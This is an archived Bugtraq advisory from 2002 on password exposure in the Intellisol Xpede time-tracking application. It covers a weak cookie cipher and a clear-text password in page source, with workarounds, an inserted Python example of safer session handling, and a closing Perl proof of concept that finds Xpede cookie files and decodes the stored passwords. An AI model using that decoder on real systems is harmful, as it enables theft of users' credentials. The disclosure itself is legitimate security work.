Xpede passwords exposed (2 vuln.)
daemon@ATHENA.MIT.EDU (Gregory Duchemin)
Fri Mar 22 12:02:18 2002
Date: 22 Mar 2002 13:04:31 -0000
Message-ID: <20020322130431.14486.qmail@mail.securityfocus.com>
From: Gregory Duchemin <c3rb3r@hotmail.com>
To: bugtraq@securityfocus.com
Passwords exposed in Intellisol XPede
=====================================
About Xpede
===========
quote from
http://www.workforceroi.com/solutions/pa/index.shtml
"Intellisol Xpede is a browser-based time and
expense entry and project cost management module
designed to connect a remote workforce on a
real-time basis.
Intellisol Project Accounting is designed for any
professional service organization such as consulting,
software development, law, architecture,
engineering, PR/advertising and more with between
10 and 500 million dollars in revenue and up to 500
employees,
and integrates with Microsoft Great Plains Business
Solutions financial suites. "
Problems
========
Tested with Xpede 4.1 / NT 4.0
Two security vulnerabilities have been discovered in
the way Xpede handles user passwords.
1/ Xpede's cookies store the user's password
"ciphered" in a very weak manner (a mix of shifts
and permutations). Recovering the clear-text password
from a cookie is trivial, which makes users remotely
vulnerable to cross-site scripting based attacks and
to various MSIE bugs. Users are locally vulnerable as
well: anyone who can read the local filesystem (i.e.
the cookie file) gets the password, for instance when
a user decides to use someone else's computer or
shares Administrator rights on a computer with others.
2/ Passwords are shown in clear text in the source of
the "session timeout" re-authentication popup.
The offending JavaScript snippet simulates a
"remember password" option and tests whether it was
checked in order to fill in the form's password field
automatically.
The clear password appears as-is in the JavaScript
source code, whatever the user chose for the option.
A user can therefore have a false sense of safety:
leaving the host even a few seconds without having
filled in the authentication popup exposes the
password to everybody lurking at the source and, once
again, leaves the user remotely vulnerable to the same
MSIE bugs mentioned above.
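Both problems above have the same root cause: credential material leaves the server and lands where the client side (a cookie file, a page's source) can give it back. The Python example below is added here and is not part of the original advisory or of the Xpede product; it shows the design that avoids both issues, namely an opaque random session token (HMAC-tagged so edited cookies are rejected, HttpOnly so script cannot read it) with the user record kept server-side, and a re-authentication form that never learns the password and so cannot embed it. An audit helper checks a cookie header or page body for the password in clear or under common reversible encodings. Every name in it (issue_session, lookup_session, render_reauth_form, exposes_password, SERVER_KEY, the sample user and password) is constructed for the example.

```python
import base64
import hashlib
import hmac
import html
import secrets
import urllib.parse

# Constructed demo key; a real deployment loads this from server-side config.
SERVER_KEY = b"demo-key-0123456789abcdef"

# Server-side session table: opaque token -> user record.
# Only the token (never the password) is sent to the browser.
SESSIONS = {}


def issue_session(userid, realname):
    """Create a session after the password has been verified server-side and
    return the Set-Cookie header value. The cookie carries a random token plus
    an HMAC tag, so the server can reject forged or edited cookies without
    putting anything secret in the cookie itself."""
    token = secrets.token_urlsafe(32)
    tag = hmac.new(SERVER_KEY, token.encode(), hashlib.sha256).hexdigest()
    SESSIONS[token] = {"userid": userid, "realname": realname}
    # HttpOnly keeps the cookie away from script (the XSS vector the advisory
    # mentions); Secure keeps it off plaintext connections.
    return f"session={token}.{tag}; Path=/; HttpOnly; Secure; SameSite=Strict"


def parse_cookie_value(set_cookie):
    """Extract the bare cookie value from a Set-Cookie header string."""
    return set_cookie.split(";", 1)[0].split("=", 1)[1]


def lookup_session(cookie_value):
    """Verify the HMAC tag in constant time, then return the user record
    (or None for a missing, malformed or tampered cookie)."""
    try:
        token, tag = cookie_value.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, token.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return SESSIONS.get(token)


def render_reauth_form(userid):
    """Session-timeout re-authentication page. This function is never given
    the password, so the password cannot end up in the page source; the
    server re-checks whatever the user types when the form is posted."""
    return (
        '<form method="post" action="/reauth">\n'
        f'  <input type="hidden" name="userid" value="{html.escape(userid)}">\n'
        '  <input type="password" name="password" autocomplete="off">\n'
        '  <input type="submit" value="Log in">\n'
        "</form>\n"
    )


def exposes_password(text, password):
    """Audit check: does a cookie header or page body contain the password in
    clear or under a trivially reversible encoding (URL-encoded, hex, base64)?
    A custom cipher like the one in the advisory still needs manual review."""
    candidates = {
        password,
        urllib.parse.quote(password, safe=""),
        password.encode().hex(),
        base64.b64encode(password.encode()).decode(),
    }
    return any(c in text for c in candidates)


def demo():
    """Run the flow once with a constructed user and report what an auditor
    would check: session works, tampering is rejected, nothing leaks."""
    password = "S3cret!pw"  # constructed; verified server-side before issue_session()
    header = issue_session("jdoe", "John Doe")
    value = parse_cookie_value(header)
    # Flip the last hex digit of the tag to simulate an edited cookie.
    tampered = value[:-1] + ("0" if value[-1] != "0" else "1")
    page = render_reauth_form("jdoe")
    return {
        "user": lookup_session(value)["userid"],
        "tampered_rejected": lookup_session(tampered) is None,
        "cookie_exposes": exposes_password(header, password),
        "page_exposes": exposes_password(page, password),
        "httponly": "HttpOnly" in header,
    }


if __name__ == "__main__":
    print(demo())
```

The point of `exposes_password` is that it is the check to run against what the application actually sends: a cookie built the way the advisory describes would fail it (or, with a custom transform, deserve the manual look), while the opaque-token cookie and the password-free form above pass it.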
Temp workarounds
================
1st problem / clear all cookies via
MSIE "Tools/Internet Options/General/Delete
Cookies" right after a session has ended
to avoid the local attack, and patch your browser
with the latest security fixes if it wasn't already
done (anyway, you may run into more serious trouble
in the latter case :).
2nd problem / do not expose the authentication
popup to unwise eyes (log in or quit the application)
and, again, patch your browser against remote attacks.
Additionally, for the paranoid, I suggest closing all
running MSIE windows before accessing the Xpede
application (and during the session).
Vendor status
=============
The vendor was contacted on March 13 and, as far as
I know, is currently working on a patch; in the
meantime, you may want to use the above workarounds.
Versions
========
Xpede's support team has reported that both the
Xpede 4.1 and 7.x series are affected by these
vulnerabilities.
Author & Date
=============
Gregory Duchemin (c3rb3r@hotmail.com)
20 March 2002.
Have a nice day.
Proof of concept (password recovery from cookies)
=================================================
#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March 2002
#

# output format
format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.

# Cookie fingerprint: first line of an Xpede cookie starts with this
$signature = "defPWD";

# decoding stuff: permutation table, alphabet and per-position shifts
@PERMU = ('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5');
@ALPHA = ('A'..'Z', 'a'..'z');
@SHIFT = (9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);

# Change the following path to match your system
@COOKIE = glob('c:\winnt\Profiles\*\Cookies\*@*.txt');

$i = $count = 0;
@FOUND = ('nope');
$REST = $decode = $temp_pass = "";

print "\n\nXdeep.pl Xpede cookies finder and decoder\n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --\n\n\n";

# Pass 1: look for the signature on the first line of every cookie file
foreach $try (@COOKIE) {
    $count++;
    if (open(handle, $try)) {
        @lines = <handle>;
        if (!index($lines[0], $signature)) {   # index() == 0 : line starts with the signature
            printf("\n+ Xpede cookie found ! yep :) <=> %s\n", $try);
            $FOUND[$i] = $try;
            $i++;
        }
        close(handle);
    }
}
printf("\n+ %d files checked.\n", $count);
if (! $i) {
    print "\n\n- No Xpede cookie found, sorry\n\n";
    exit(0);
}
printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
$try = <STDIN>;

# Pass 2: pull the fields out of the cookie file (fixed line offsets in the
# MSIE cookie format), URL-decode them and undo the "cipher"
foreach $try (@FOUND) {
    if (open(handle, $try)) {
        @lines = <handle>;
        $userid   = $lines[55];
        $realname = $lines[64];
        $password = $lines[46];
        $company  = $lines[28];
        # URL-decoding: '+' to space, then %XX escapes
        foreach $field ($userid, $realname, $password, $company) {
            $field =~ s/\+/ /g;
            $field =~ s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
        }
        printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
        write;
        print "\n\n! Cr4cking 1n progr3ss ... \n";
        @list = split //, $password;
        # Only the last 11 characters (followed by the line's newline) are
        # ciphered; anything stored before them is in clear.
        if (length($password) > 12) {
            $MAX  = 11;
            $DIFF = length($password) - 1 - $MAX;
            for ($i = 0; $i < $DIFF; $i++) { $REST = $REST . $list[$i]; }
            splice(@list, 0, $DIFF);
            printf "\n+ Clear part is %s\n", $REST;
        }
        else {
            $MAX = length($password) - 1;
            printf "\n- No clear part found \n";
        }
        # Undo the permutation
        for ($i = 0; $i < $MAX; $i++) { $temp_pass = $temp_pass . $list[$PERMU[$i] - 1]; }
        printf "\n+ Permutations give %s\n", $temp_pass;
        # Undo the per-position shift over the 52-letter alphabet
        @list = split //, $temp_pass;
        for ($i = 0; $i < $MAX; $i++) {
            $b = ord($list[$i]);
            $c = $SHIFT[$i];
            $flag = 0;
            for ($z = 0; $z < 52; $z += 1) {
                if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA[($z + $c) % 52]); $flag = 1; }
            }
            if (!$flag) { $a = $b; }   # characters outside [A-Za-z] are left as they are
            $decode = $decode . chr($a);
            printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr($a);
        }
        printf "\n\n+ Shifting with secret key give %s\n", $decode;
        printf "\n! Password is \"%s\"\n\n", $decode . $REST;
        printf "\n\n- End.\n\n";
        $decode = $REST = $temp_pass = "";
        close(handle);
        print "\n\n[Press return]\n";
        $try = <STDIN>;
    }
}